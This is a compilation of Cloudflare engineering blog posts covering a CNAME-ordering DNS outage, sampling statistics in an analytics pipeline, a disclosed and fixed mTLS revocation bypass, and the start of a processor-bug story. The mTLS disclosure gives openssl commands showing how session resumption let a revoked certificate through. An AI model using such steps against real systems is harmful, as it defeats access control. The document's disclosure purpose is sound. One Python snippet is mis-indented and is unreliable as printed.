The Cloudflare Blog

What came first: the CNAME or the A record?

Sebastiaan Neuteboom — Wed, 14 Jan 2026 00:00:00 GMT

On January 8, 2026, a routine update to 1.1.1.1 aimed at reducing memory usage accidentally triggered a wave of DNS resolution failures for users across the Internet. The root cause wasn't an attack or an outage, but a subtle shift in the order of records within our DNS responses.

While most modern software treats the order of records in DNS responses as irrelevant, we discovered that some implementations expect CNAME records to appear before everything else. When that order changed, resolution started failing. This post explores the code change that caused the shift, why it broke specific DNS clients, and the 40-year-old protocol ambiguity that makes the "correct" order of a DNS response difficult to define.

Timeline

All timestamps referenced are in Coordinated Universal Time (UTC).

Time	Description
2025-12-02	The record reordering is introduced to the 1.1.1.1 codebase
2025-12-10	The change is released to our testing environment
2026-01-07 23:48	A global release containing the change starts
2026-01-08 17:40	The release reaches 90% of servers
2026-01-08 18:19	Incident is declared
2026-01-08 18:27	The release is reverted
2026-01-08 19:55	Revert is completed. Impact ends

What happened?

While making some improvements to lower the memory usage of our cache implementation, we introduced a subtle change to CNAME record ordering. The change was introduced on December 2, 2025, released to our testing environment on December 10, and began deployment on January 7, 2026.

How DNS CNAME chains work

When you query for a domain like www.example.com, you might get a CNAME (Canonical Name) record that indicates one name is an alias for another name. It’s the job of public resolvers, such as 1.1.1.1, to follow this chain of aliases until it reaches a final response:

www.example.com → cdn.example.com → server.cdn-provider.com → 198.51.100.1

As 1.1.1.1 traverses this chain, it caches every intermediate record. Each record in the chain has its own TTL (Time-To-Live), indicating how long we can cache it. Not all the TTLs in a CNAME chain need to be the same:

www.example.com → cdn.example.com (TTL: 3600 seconds) # Still cached cdn.example.com → 198.51.100.1 (TTL: 300 seconds) # Expired

When one or more records in a CNAME chain expire, it’s considered partially expired. Fortunately, since parts of the chain are still in our cache, we don’t have to resolve the entire CNAME chain again — only the part that has expired. In our example above, we would take the still valid www.example.com → cdn.example.com chain, and only resolve the expired cdn.example.com A record. Once that’s done, we combine the existing CNAME chain and the newly resolved records into a single response.

The logic change

The code that merges these two chains is where the change occurred. Previously, the code would create a new list, insert the existing CNAME chain, and then append the new records:

impl PartialChain {
    /// Merges records to the cache entry to make the cached records complete.
    pub fn fill_cache(&self, entry: &mut CacheEntry) {
        let mut answer_rrs = Vec::with_capacity(entry.answer.len() + self.records.len());
        answer_rrs.extend_from_slice(&self.records); // CNAMEs first
        answer_rrs.extend_from_slice(&entry.answer); // Then A/AAAA records
        entry.answer = answer_rrs;
    }
}

However, to save some memory allocations and copies, the code was changed to instead append the CNAMEs to the existing answer list:

impl PartialChain {
    /// Merges records to the cache entry to make the cached records complete.
    pub fn fill_cache(&self, entry: &mut CacheEntry) {
        entry.answer.extend(self.records); // CNAMEs last
    }
}

As a result, the responses that 1.1.1.1 returned now sometimes had the CNAME records appearing at the bottom, after the final resolved answer.

Why this caused impact

When DNS clients receive a response with a CNAME chain in the answer section, they also need to follow this chain to find out that www.example.com points to 198.51.100.1. Some DNS client implementations handle this by keeping track of the expected name for the records as they’re iterated sequentially. When a CNAME is encountered, the expected name is updated:

;; QUESTION SECTION:
;; www.example.com.        IN    A

;; ANSWER SECTION:
www.example.com.    3600   IN    CNAME  cdn.example.com.
cdn.example.com.    300    IN    A      198.51.100.1

Find records for www.example.com
Encounter www.example.com. CNAME cdn.example.com
Find records for cdn.example.com
Encounter cdn.example.com. A 198.51.100.1

When the CNAME suddenly appears at the bottom, this no longer works:

;; QUESTION SECTION:
;; www.example.com.	       IN    A

;; ANSWER SECTION:
cdn.example.com.    300    IN    A      198.51.100.1
www.example.com.    3600   IN    CNAME  cdn.example.com.

Find records for www.example.com
Ignore cdn.example.com. A 198.51.100.1 as it doesn’t match the expected name
Encounter www.example.com. CNAME cdn.example.com
Find records for cdn.example.com
No more records are present, so the response is considered empty

One such implementation that broke is the getaddrinfo function in glibc, which is commonly used on Linux for DNS resolution. When looking at its getanswer_r implementation, we can indeed see it expects to find the CNAME records before any answers:

for (; ancount > 0; --ancount)
  {
    // ... parsing DNS records ...
    
    if (rr.rtype == T_CNAME)
      {
        /* Record the CNAME target as the new expected name. */
        int n = __ns_name_unpack (c.begin, c.end, rr.rdata,
                                  name_buffer, sizeof (name_buffer));
        expected_name = name_buffer;  // Update what we're looking for
      }
    else if (rr.rtype == qtype
             && __ns_samebinaryname (rr.rname, expected_name)  // Must match!
             && rr.rdlength == rrtype_to_rdata_length (type:qtype))
      {
        /* Address record matches - store it */
        ptrlist_add (list:addresses, item:(char *) alloc_buffer_next (abuf, uint32_t));
        alloc_buffer_copy_bytes (buf:abuf, src:rr.rdata, size:rr.rdlength);
      }
  }

Another notable affected implementation was the DNSC process in three models of Cisco ethernet switches. In the case where switches had been configured to use 1.1.1.1 these switches experienced spontaneous reboot loops when they received a response containing the reordered CNAMEs. Cisco has published a service document describing the issue.

Not all implementations break

Most DNS clients don’t have this issue. For example, systemd-resolved first parses the records into an ordered set:

typedef struct DnsAnswerItem {
        DnsResourceRecord *rr; // The actual record
        DnsAnswerFlags flags;  // Which section it came from
        // ... other metadata
} DnsAnswerItem;


typedef struct DnsAnswer {
        unsigned n_ref;
        OrderedSet *items;
} DnsAnswer;

When following a CNAME chain it can then search the entire answer set, even if the CNAME records don’t appear at the top.

What the RFC says

RFC 1034, published in 1987, defines much of the behavior of the DNS protocol, and should give us an answer on whether the order of CNAME records matters. Section 4.3.1 contains the following text:

If recursive service is requested and available, the recursive response to a query will be one of the following:
- The answer to the query, possibly preface by one or more CNAME RRs that specify aliases encountered on the way to an answer.

While "possibly preface" can be interpreted as a requirement for CNAME records to appear before everything else, it does not use normative key words, such as MUST and SHOULD that modern RFCs use to express requirements. This isn’t a flaw in RFC 1034, but simply a result of its age. RFC 2119, which standardized these key words, was published in 1997, 10 years after RFC 1034.

In our case, we did originally implement the specification so that CNAMEs appear first. However, we did not have any tests asserting the behavior remains consistent due to the ambiguous language in the RFC.

The subtle distinction: RRsets vs RRs in message sections

To understand why this ambiguity exists, we need to understand a subtle but important distinction in DNS terminology.

RFC 1034 section 3.6 defines Resource Record Sets (RRsets) as collections of records with the same name, type, and class. For RRsets, the specification is clear about ordering:

The order of RRs in a set is not significant, and need not be preserved by name servers, resolvers, or other parts of the DNS.

However, RFC 1034 doesn’t clearly specify how message sections relate to RRsets. While modern DNS specifications have shown that message sections can indeed contain multiple RRsets (consider DNSSEC responses with signatures), RFC 1034 doesn’t describe message sections in those terms. Instead, it treats message sections as containing individual Resource Records (RRs).

The problem is that the RFC primarily discusses ordering in the context of RRsets but doesn't specify the ordering of different RRsets relative to each other within a message section. This is where the ambiguity lives.

RFC 1034 section 6.2.1 includes an example that demonstrates this ambiguity further. It mentions that the order of Resource Records (RRs) is not significant either:

The difference in ordering of the RRs in the answer section is not significant.

However, this example only shows two A records for the same name within the same RRset. It doesn't address whether this applies to different record types like CNAMEs and A records.

CNAME chain ordering

It turns out that this issue extends beyond putting CNAME records before other record types. Even when CNAMEs appear before other records, sequential parsing can still break if the CNAME chain itself is out of order. Consider the following response:

;; QUESTION SECTION:
;; www.example.com.              IN    A

;; ANSWER SECTION:
cdn.example.com.           3600  IN    CNAME  server.cdn-provider.com.
www.example.com.           3600  IN    CNAME  cdn.example.com.
server.cdn-provider.com.   300   IN    A      198.51.100.1

Each CNAME belongs to a different RRset, as they have different owners, so the statement about RRset order being insignificant doesn’t apply here.

However, RFC 1034 doesn't specify that CNAME chains must appear in any particular order. There's no requirement that www.example.com. CNAME cdn.example.com. must appear before cdn.example.com. CNAME server.cdn-provider.com.. With sequential parsing, the same issue occurs:

Find records for www.example.com
Ignore cdn.example.com. CNAME server.cdn-provider.com. as it doesn’t match the expected name
Encounter www.example.com. CNAME cdn.example.com
Find records for cdn.example.com
Ignore server.cdn-provider.com. A 198.51.100.1 as it doesn’t match the expected name

What should resolvers do?

RFC 1034 section 5 describes resolver behavior. Section 5.2.2 specifically addresses how resolvers should handle aliases (CNAMEs):

In most cases a resolver simply restarts the query at the new name when it encounters a CNAME.

This suggests that resolvers should restart the query upon finding a CNAME, regardless of where it appears in the response. However, it's important to distinguish between different types of resolvers:

Recursive resolvers, like 1.1.1.1, are full DNS resolvers that perform recursive resolution by querying authoritative nameservers
Stub resolvers, like glibc’s getaddrinfo, are simplified local interfaces that forward queries to recursive resolvers and process the responses

The RFC sections on resolver behavior were primarily written with full resolvers in mind, not the simplified stub resolvers that most applications actually use. Some stub resolvers evidently don’t implement certain parts of the spec, such as the CNAME-restart logic described in the RFC.

The DNSSEC specifications provide contrast

Later DNS specifications demonstrate a different approach to defining record ordering. RFC 4035, which defines protocol modifications for DNSSEC, uses more explicit language:

When placing a signed RRset in the Answer section, the name server MUST also place its RRSIG RRs in the Answer section. The RRSIG RRs have a higher priority for inclusion than any other RRsets that may have to be included.

The specification uses "MUST" and explicitly defines "higher priority" for RRSIG records. However, "higher priority for inclusion" refers to whether RRSIGs should be included in the response, not where they should appear. This provides unambiguous guidance to implementers about record inclusion in DNSSEC contexts, while not mandating any particular behavior around record ordering.

For unsigned zones, however, the ambiguity from RFC 1034 remains. The word "preface" has guided implementation behavior for nearly four decades, but it has never been formally specified as a requirement.

Do CNAME records come first?

While in our interpretation the RFCs do not require CNAMEs to appear in any particular order, it’s clear that at least some widely-deployed DNS clients rely on it. As some systems using these clients might be updated infrequently, or never updated at all, we believe it’s best to require CNAME records to appear in-order before any other records.

Based on what we have learned during this incident, we have reverted the CNAME re-ordering and do not intend to change the order in the future.

To prevent any future incidents or confusion, we have written a proposal in the form of an Internet-Draft to be discussed at the IETF. If consensus is reached on the clarified behavior, this would become an RFC that explicitly defines how to correctly handle CNAMEs in DNS responses, helping us and the wider DNS community navigate the protocol. The proposal can be found at https://datatracker.ietf.org/doc/draft-jabley-dnsop-ordered-answer-section. If you have suggestions or feedback we would love to hear your opinions, most usefully via the DNSOP working group at the IETF.

Over 700 million events/second: How we make sense of too much data

Constantin Pan — Mon, 27 Jan 2025 14:00:00 GMT

Cloudflare's network provides an enormous array of services to our customers. We collect and deliver associated data to customers in the form of event logs and aggregated analytics. As of December 2024, our data pipeline is ingesting up to 706M events per second generated by Cloudflare's services, and that represents 100x growth since our 2018 data pipeline blog post.

At peak, we are moving 107 GiB/s of compressed data, either pushing it directly to customers or subjecting it to additional queueing and batching.

All of these data streams power things like Logs, Analytics, and billing, as well as other products, such as training machine learning models for bot detection. This blog post is focused on techniques we use to efficiently and accurately deal with the high volume of data we ingest for our Analytics products. A previous blog post provides a deeper dive into the data pipeline for Logs.

The pipeline can be roughly described by the following diagram.

The data pipeline has multiple stages, and each can and will naturally break or slow down because of hardware failures or misconfiguration. And when that happens, there is just too much data to be able to buffer it all for very long. Eventually some will get dropped, causing gaps in analytics and a degraded product experience unless proper mitigations are in place.

Dropping data to retain information

How does one retain valuable information from more than half a billion events per second, when some must be dropped? Drop it in a controlled way, by downsampling.

Here is a visual analogy showing the difference between uncontrolled data loss and downsampling. In both cases the same number of pixels were delivered. One is a higher resolution view of just a small portion of a popular painting, while the other shows the full painting, albeit blurry and highly pixelated.

As we noted above, any point in the pipeline can fail, so we want the ability to downsample at any point as needed. Some services proactively downsample data at the source before it even hits Logfwdr. This makes the information extracted from that data a little bit blurry, but much more useful than what otherwise would be delivered: random chunks of the original with gaps in between, or even nothing at all. The amount of "blur" is outside our control (we make our best effort to deliver full data), but there is a robust way to estimate it, as discussed in the next section.

Logfwdr can decide to downsample data sitting in the buffer when it overflows. Logfwdr handles many data streams at once, so we need to prioritize them by assigning each data stream a weight and then applying max-min fairness to better utilize the buffer. It allows each data stream to store as much as it needs, as long as the whole buffer is not saturated. Once it is saturated, streams divide it fairly according to their weighted size.

In our implementation (Go), each data stream is driven by a goroutine, and they cooperate via channels. They consult a single tracker object every time they allocate and deallocate memory. The tracker uses a max-heap to always know who the heaviest participant is and what the total usage is. Whenever the total usage goes over the limit, the tracker repeatedly sends the "please shed some load" signal to the heaviest participant, until the usage is again under the limit.

The effect of this is that healthy streams, which buffer a tiny amount, allocate whatever they need without losses. But any lagging streams split the remaining memory allowance fairly.

We downsample more or less uniformly, by always taking some of the least downsampled batches from the buffer (using min-heap to find those) and merging them together upon downsampling.

^{Merging keeps the batches roughly the same size and their number under control.}

Downsampling is cheap, but since data in the buffer is compressed, it causes recompression, which is the single most expensive thing we do to the data. But using extra CPU time is the last thing you want to do when the system is under heavy load! We compensate for the recompression costs by starting to downsample the fresh data as well (before it gets compressed for the first time) whenever the stream is in the "shed the load" state.

We called this approach "bottomless buffers", because you can squeeze effectively infinite amounts of data in there, and it will just automatically be thinned out. Bottomless buffers resemble reservoir sampling, where the buffer is the reservoir and the population comes as the input stream. But there are some differences. First is that in our pipeline the input stream of data never ends, while reservoir sampling assumes it ends to finalize the sample. Secondly, the resulting sample also never ends.

Let's look at the next stage in the pipeline: Logreceiver. It sits in front of a distributed queue. The purpose of logreceiver is to partition each stream of data by a key that makes it easier for Logpush, Analytics inserters, or some other process to consume.

Logreceiver proactively performs adaptive sampling of analytics. This improves the accuracy of analytics for small customers (receiving on the order of 10 events per day), while more aggressively downsampling large customers (millions of events per second). Logreceiver then pushes the same data at multiple resolutions (100%, 10%, 1%, etc.) into different topics in the distributed queue. This allows it to keep pushing something rather than nothing when the queue is overloaded, by just skipping writing the high-resolution samples of data.

The same goes for Inserters: they can skip reading or writing high-resolution data. The Analytics APIs can skip reading high resolution data. The analytical database might be unable to read high resolution data because of overload or degraded cluster state or because there is just too much to read (very wide time range or very large customer). Adaptively dropping to lower resolutions allows the APIs to return some results in all of those cases.

Extracting value from downsampled data

Okay, we have some downsampled data in the analytical database. It looks like the original data, but with some rows missing. How do we make sense of it? How do we know if the results can be trusted?

Let's look at the math.

Since the amount of sampling can vary over time and between nodes in the distributed system, we need to store this information along with the data. With each event $x_i$ we store its sample interval, which is the reciprocal to its inclusion probability $\pi_i = \frac{1}{\text{sample interval}}$. For example, if we sample 1 in every 1,000 events, each of the events included in the resulting sample will have its $\pi_i = 0.001$, so the sample interval will be 1,000. When we further downsample that batch of data, the inclusion probabilities (and the sample intervals) multiply together: a 1 in 1,000 sample from a 1 in 1,000 sample is a 1 in 1,000,000 sample of the original population. The sample interval of an event can also be interpreted roughly as the number of original events that this event represents, so in the literature it is known as weight $w_i = \frac{1}{\pi_i}$.

We rely on the Horvitz-Thompson estimator (HT, paper) in order to derive analytics about $x_i$. It gives two estimates: the analytical estimate (e.g. the population total or size) and the estimate of the variance of that estimate. The latter enables us to figure out how accurate the results are by building confidence intervals. They define ranges that cover the true value with a given probability (confidence level). A typical confidence level is 0.95, at which a confidence interval (a, b) tells that you can be 95% sure the true SUM or COUNT is between a and b.

So far, we know how to use the HT estimator for doing SUM, COUNT, and AVG.

Given a sample of size $n$, consisting of values $x_i$ and their inclusion probabilities $\pi_i$, the HT estimator for the population total (i.e. SUM) would be $$\widehat{T}=\sum_{i=1}^n{\frac{x_i}{\pi_i}}=\sum_{i=1}^n{x_i w_i}.$$ The variance of $\widehat{T}$ is: $$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{\pi_{ij} - \pi_i \pi_j}{\pi_{ij} \pi_i \pi_j}},$$ where $\pi_{ij}$ is the probability of both $i$-th and $j$-th events being sampled together.

We use Poisson sampling, where each event is subjected to an independent Bernoulli trial ("coin toss") which determines whether the event becomes part of the sample. Since each trial is independent, we can equate $\pi_{ij} = \pi_i \pi_j$, which when plugged in the variance estimator above turns the right-hand sum to zero: $$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{0}{\pi_{ij} \pi_i \pi_j}},$$ thus $$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{x_i^2 w_i (w_i-1)}.$$ For COUNT we use the same estimator, but plug in $x_i = 1$. This gives us: $$\begin{align} \widehat{C} &= \sum_{i=1}^n{\frac{1}{\pi_i}} = \sum_{i=1}^n{w_i},\\ \widehat{V}(\widehat{C}) &= \sum_{i=1}^n{\frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{w_i (w_i-1)}. \end{align}$$ For AVG we would use $$\begin{align} \widehat{\mu} &= \frac{\widehat{T}}{N},\\ \widehat{V}(\widehat{\mu}) &= \frac{\widehat{V}(\widehat{T})}{N^2}, \end{align}$$ if we could, but the original population size $N$ is not known, it is not stored anywhere, and it is not even possible to store because of custom filtering at query time. Plugging $\widehat{C}$ instead of $N$ only partially works. It gives a valid estimator for the mean itself, but not for its variance, so the constructed confidence intervals are unusable.

In all cases the corresponding pair of estimates are used as the $\mu$ and $\sigma^2$ of the normal distribution (because of the central limit theorem), and then the bounds for the confidence interval (of confidence level ) are: $$\Big( \mu - \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma, \quad \mu + \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma\Big).$$

We do not know the N, but there is a workaround: simultaneous confidence intervals. Construct confidence intervals for SUM and COUNT independently, and then combine them into a confidence interval for AVG. This is known as the Bonferroni method. It requires generating wider (half the "inconfidence") intervals for SUM and COUNT. Here is a simplified visual representation, but the actual estimator will have to take into account the possibility of the orange area going below zero.

In SQL, the estimators and confidence intervals look like this:

WITH sum(x * _sample_interval)                              AS t,
     sum(x * x * _sample_interval * (_sample_interval - 1)) AS vt,
     sum(_sample_interval)                                  AS c,
     sum(_sample_interval * (_sample_interval - 1))         AS vc,
     -- ClickHouse does not expose the erf⁻¹ function, so we precompute some magic numbers,
     -- (only for 95% confidence, will be different otherwise):
     --   1.959963984540054 = Φ⁻¹((1+0.950)/2) = √2 * erf⁻¹(0.950)
     --   2.241402727604945 = Φ⁻¹((1+0.975)/2) = √2 * erf⁻¹(0.975)
     1.959963984540054 * sqrt(vt) AS err950_t,
     1.959963984540054 * sqrt(vc) AS err950_c,
     2.241402727604945 * sqrt(vt) AS err975_t,
     2.241402727604945 * sqrt(vc) AS err975_c
SELECT t - err950_t AS lo_total,
       t            AS est_total,
       t + err950_t AS hi_total,
       c - err950_c AS lo_count,
       c            AS est_count,
       c + err950_c AS hi_count,
       (t - err975_t) / (c + err975_c) AS lo_average,
       t / c                           AS est_average,
       (t + err975_t) / (c - err975_c) AS hi_average
FROM ...

Construct a confidence interval for each timeslot on the timeseries, and you get a confidence band, clearly showing the accuracy of the analytics. The figure below shows an example of such a band in shading around the line.

Sampling is easy to screw up

We started using confidence bands on our internal dashboards, and after a while noticed something scary: a systematic error! For one particular website the "total bytes served" estimate was higher than the true control value obtained from rollups, and the confidence bands were way off. See the figure below, where the true value (blue line) is outside the yellow confidence band at all times.

We checked the stored data for corruption, it was fine. We checked the math in the queries, it was fine. It was only after reading through the source code for all of the systems responsible for sampling that we found a candidate for the root cause.

We used simple random sampling everywhere, basically "tossing a coin" for each event, but in Logreceiver sampling was done differently. Instead of sampling randomly it would perform systematic sampling by picking events at equal intervals starting from the first one in the batch.

Why would that be a problem?

There are two reasons. The first is that we can no longer claim $\pi_{ij} = \pi_i \pi_j$, so the simplified variance estimator stops working and confidence intervals cannot be trusted. But even worse, the estimator for the total becomes biased. To understand why exactly, we wrote a short repro code in Python:

import itertools

def take_every(src, period):
    for i, x in enumerate(src):
    if i % period == 0:
        yield x

pattern = [10, 1, 1, 1, 1, 1]
sample_interval = 10 # bad if it has common factors with len(pattern)
true_mean = sum(pattern) / len(pattern)

orig = itertools.cycle(pattern)
sample_size = 10000
sample = itertools.islice(take_every(orig, sample_interval), sample_size)

sample_mean = sum(sample) / sample_size

print(f"{true_mean=} {sample_mean=}")

After playing with different values for pattern and sample_interval in the code above, we realized where the bias was coming from.

Imagine a person opening a huge generated HTML page with many small/cached resources, such as icons. The first response will be big, immediately followed by a burst of small responses. If the website is not visited that much, responses will tend to end up all together at the start of a batch in Logfwdr. Logreceiver does not cut batches, only concatenates them. The first response remains first, so it always gets picked and skews the estimate up.

We checked the hypothesis against the raw unsampled data that we happened to have because that particular website was also using one of the Logs products. We took all events in a given time range, and grouped them by cutting at gaps of at least one minute. In each group, we ranked all events by time and looked at the variable of interest (response size in bytes), and put it on a scatter plot against the rank inside the group.

A clear pattern! The first response is much more likely to be larger than average.

We fixed the issue by making Logreceiver shuffle the data before sampling. As we rolled out the fix, the estimation and the true value converged.

Now, after battle testing it for a while, we are confident the HT estimator is implemented properly and we are using the correct sampling process.

Using Cloudflare's analytics APIs to query sampled data

We already power most of our analytics datasets with sampled data. For example, the Workers Analytics Engine exposes the sample interval in SQL, allowing our customers to build their own dashboards with confidence bands. In the GraphQL API, all of the data nodes that have "Adaptive" in their name are based on sampled data, and the sample interval is exposed as a field there as well, though it is not possible to build confidence intervals from that alone. We are working on exposing confidence intervals in the GraphQL API, and as an experiment have added them to the count and edgeResponseBytes (sum) fields on the httpRequestsAdaptiveGroups nodes. This is available under confidence(level: X).

Here is a sample GraphQL query:

query HTTPRequestsWithConfidence(
  $accountTag: string
  $zoneTag: string
  $datetimeStart: string
  $datetimeEnd: string
) {
  viewer {
    zones(filter: { zoneTag: $zoneTag }) {
      httpRequestsAdaptiveGroups(
        filter: {
          datetime_geq: $datetimeStart
          datetime_leq: $datetimeEnd
      }
      limit: 100
    ) {
      confidence(level: 0.95) {
        level
        count {
          estimate
          lower
          upper
          sampleSize
        }
        sum {
          edgeResponseBytes {
            estimate
            lower
            upper
            sampleSize
          }
        }
      }
    }
  }
}

The query above asks for the estimates and the 95% confidence intervals for SUM(edgeResponseBytes) and COUNT. The results will also show the sample size, which is good to know, as we rely on the central limit theorem to build the confidence intervals, thus small samples don't work very well.

Here is the response from this query:

{
  "data": {
    "viewer": {
      "zones": [
        {
          "httpRequestsAdaptiveGroups": [
            {
              "confidence": {
                "level": 0.95,
                "count": {
                  "estimate": 96947,
                  "lower": "96874.24",
                  "upper": "97019.76",
                  "sampleSize": 96294
                },
                "sum": {
                  "edgeResponseBytes": {
                    "estimate": 495797559,
                    "lower": "495262898.54",
                    "upper": "496332219.46",
                    "sampleSize": 96294
                  }
                }
              }
            }
          ]
        }
      ]
    }
  },
  "errors": null
}

The response shows the estimated count is 96947, and we are 95% confident that the true count lies in the range 96874.24 to 97019.76. Similarly, the estimate and range for the sum of response bytes are provided.

The estimates are based on a sample size of 96294 rows, which is plenty of samples to calculate good confidence intervals.

Conclusion

We have discussed what kept our data pipeline scalable and resilient despite doubling in size every 1.5 years, how the math works, and how it is easy to mess up. We are constantly working on better ways to keep the data pipeline, and the products based on it, useful to our customers. If you are interested in doing things like that and want to help us build a better Internet, check out our careers page.

mTLS client certificate revocation vulnerability with TLS Session Resumption

Rushil Mehra — Mon, 03 Apr 2023 13:00:00 GMT

On December 16, 2022, Cloudflare discovered a bug where, in limited circumstances, some users with revoked certificates may not have been blocked by Cloudflare firewall settings. Specifically, Cloudflare’s Firewall Rules solution did not block some users with revoked certificates from resuming a session via mutual transport layer security (mTLS), even if the customer had configured Firewall Rules to do so. This bug has been mitigated, and we have no evidence of this being exploited. We notified any customers that may have been impacted in an abundance of caution, so they can check their own logs to determine if an mTLS protected resource was accessed by entities holding a revoked certificate.

What happened?

One of Cloudflare Firewall Rules’ features, introduced in March 2021, lets customers revoke or block a client certificate, preventing it from being used to authenticate and establish a session. For example, a customer may use Firewall Rules to protect a service by requiring clients to provide a client certificate through the mTLS authentication protocol. Customers could also revoke or disable a client certificate, after which it would no longer be able to be used to authenticate a party initiating an encrypted session via mTLS.

When Cloudflare receives traffic from an end user, a service at the edge is responsible for terminating the incoming TLS connection. From there, this service is a reverse proxy, and it is responsible for acting as a bridge between the end user and various upstreams. Upstreams might include other services within Cloudflare such as Workers or Caching, or may travel through Cloudflare to an external server such as an origin hosting content. Sometimes, you may want to restrict access to an endpoint, ensuring that only authorized actors can access it. Using client certificates is a common way of authenticating users. This is referred to as mutual TLS, because both the server and client provide a certificate. When mTLS is enabled for a specific hostname, this service at the edge is responsible for parsing the incoming client certificate and converting that into metadata that is attached to HTTP requests that are forwarded to upstreams. The upstreams can process this metadata and make the decision whether the client is authorized or not.

Customers can use the Cloudflare dashboard to revoke existing client certificates. Instead of immediately failing handshakes involving revoked client certificates, revocation is optionally enforced via Firewall Rules, which take effect at the HTTP request level. This leaves the decision to enforce revocation with the customer.

So how exactly does this service determine whether a client certificate is revoked?

When we see a client certificate presented as part of the TLS handshake, we store the entire certificate chain on the TLS connection. This means that for every HTTP request that is sent on the connection, the client certificate chain is available to the application. When we receive a request, we look at the following fields related to a client certificate chain:

Leaf certificate Subject Key Identifier (SKI)
Leaf certificate Serial Number (SN)
Issuer certificate SKI
Issuer certificate SN

Some of these values are used for upstream processing, but the issuer SKI and leaf certificate SN are used to query our internal data stores for revocation status. The data store indexes on an issuer SKI, and stores a collection of revoked leaf certificate serial numbers. If we find the leaf certificate in this collection, we set the relevant metadata for consumption in Firewall Rules.

But what does this have to do with TLS session resumption?

To explain this, let’s first discuss how session resumption works. At a high level, session resumption grants the ability for clients and servers to expedite the handshake process, saving both time and resources. The idea is that if a client and server successfully handshake, then future handshakes are more or less redundant, assuming nothing about the handshake needs to change at a fundamental level (e.g. cipher suite or TLS version).

Traditionally, there are two mechanisms for session resumption - session IDs and session tickets. In both cases, the TLS server will handle encrypting the context of the session, which is basically a snapshot of the acquired TLS state that is built up during the handshake process. Session IDs work in a stateful fashion, meaning that the server is responsible for saving this state, somewhere, and keying against the session ID. When a client provides a session ID in the client hello, the server checks to see if it has a corresponding session cached. If it does, then the handshake process is expedited and the cached session is restored. In contrast, session tickets work in a stateless fashion, meaning that the server has no need to store the encrypted session context. Instead, the server sends the client the encrypted session context (AKA a session ticket). In future handshakes, the client can send the session ticket in the client hello, which the server can decrypt in order to restore the session and expedite the handshake.

Recall that when a client presents a certificate, we store the certificate chain on the TLS connection. It was discovered that when sessions were resumed, the code to store the client certificate chain in application data did not run. As a result, we were left with an empty certificate chain, meaning we were unable to check the revocation status and pass this information to firewall rules for further processing.

To illustrate this, let's use an example where mTLS is used for api.example.com. Firewall Rules are configured to block revoked certificates, and all certificates are revoked. We can reconstruct the client certificate checking behavior using a two-step process. First we use OpenSSL's s_client to perform a handshake using the revoked certificate (recall that revocation has nothing to do with the success of the handshake - it only affects HTTP requests on the connection), and dump the session’s context into a "session.txt" file. We then issue an HTTP request on the connection, which fails with a 403 status code response because the certificate is revoked.

❯ echo -e "GET / HTTP/1.1\r\nHost:api.example.com\r\n\r\n" | openssl s_client -connect api.example.com:443 -cert cert2.pem -key key2.pem -ign_eof  -sess_out session.txt | grep 'HTTP/1.1'
depth=2 C=IE, O=Baltimore, OU=CyberTrust, CN=Baltimore CyberTrust Root
verify return:1
depth=1 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
verify return:1
depth=0 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
verify return:1
HTTP/1.1 403 Forbidden
^C⏎

Now, if we reuse "session.txt" to perform session resumption and then issue an identical HTTP request, the request succeeds. This shouldn't happen. We should fail both requests because they both use the same revoked client certificate.

❯ echo -e "GET / HTTP/1.1\r\nHost:api.example.com\r\n\r\n" | openssl s_client -connect api.example.com:443 -cert cert2.pem -key key2.pem -ign_eof -sess_in session.txt | grep 'HTTP/1.1'
HTTP/1.1 200 OK

How we addressed the problem

Upon realizing that session resumption led to the inability to properly check revocation status, our first reaction was to disable session resumption for all mTLS connections. This blocked the vulnerability immediately.

The next step was to figure out how to safely re-enable resumption for mTLS. To do so, we need to remove the requirement of depending on data stored within the TLS connection state. Instead, we can use an API call that will grant us access to the leaf certificate in both session resumption and non session resumption cases. Two pieces of information are necessary: the leaf certificate serial number and the issuer SKI. The issuer SKI is actually included in the leaf certificate, also known as the Authority Key Identifier (AKI). Similar to how one would obtain the SKI for a certificate, X509_get0_subject_key_id, we can use X509_get0_authority_key_id to get the AKI.

Detailed timeline

All timestamps are in UTC

In March 2021 we introduced a new feature in Firewall Rules that allows customers to block traffic from revoked mTLS certificates.

2022-12-16 21:53 - Cloudflare discovers that the vulnerability resulted from a bug whereby certificate revocation status was not checked for session resumptions. Cloudflare begins working on a fix to disable session resumption for all mTLS connections to the edge.2022-12-17 02:20 - Cloudflare validates the fix and starts to roll out a fix globally.2022-12-17 21:07 - Rollout is complete, mitigating the vulnerability.2023-01-12 16:40 - Cloudflare starts to roll out a fix that supports both session resumption and revocation.2023-01-18 14:07 - Rollout is complete.

In conclusion: once Cloudflare identified the vulnerability, a remediation was put into place quickly. A fix that correctly supports session resumption and revocation has been fully rolled out as of 2023-01-18. After reviewing the logs, Cloudflare has not seen any evidence that this vulnerability has been exploited in the wild.

However improbable: The story of a processor bug

David Wragg — Thu, 18 Jan 2018 12:06:48 GMT

Processor problems have been in the news lately, due to the Meltdown and Spectre vulnerabilities. But generally, engineers writing software assume that computer hardware operates in a reliable, well-understood fashion, and that any problems lie on the software side of the software-hardware divide. Modern processor chips routinely execute many billions of instructions in a second, so any erratic behaviour must be very hard to trigger, or it would quickly become obvious.

But sometimes that assumption of reliable processor hardware doesn’t hold. Last year at Cloudflare, we were affected by a bug in one of Intel’s processor models. Here’s the story of how we found we had a mysterious problem, and how we tracked down the cause.

CC-BY-SA-3.0 image by Alterego

Prologue

Back in February 2017, Cloudflare disclosed a security problem which became known as Cloudbleed. The bug behind that incident lay in some code that ran on our servers to parse HTML. In certain cases involving invalid HTML, the parser would read data from a region of memory beyond the end of the buffer being parsed. The adjacent memory might contain other customers’ data, which would then be returned in the HTTP response, and the result was Cloudbleed.

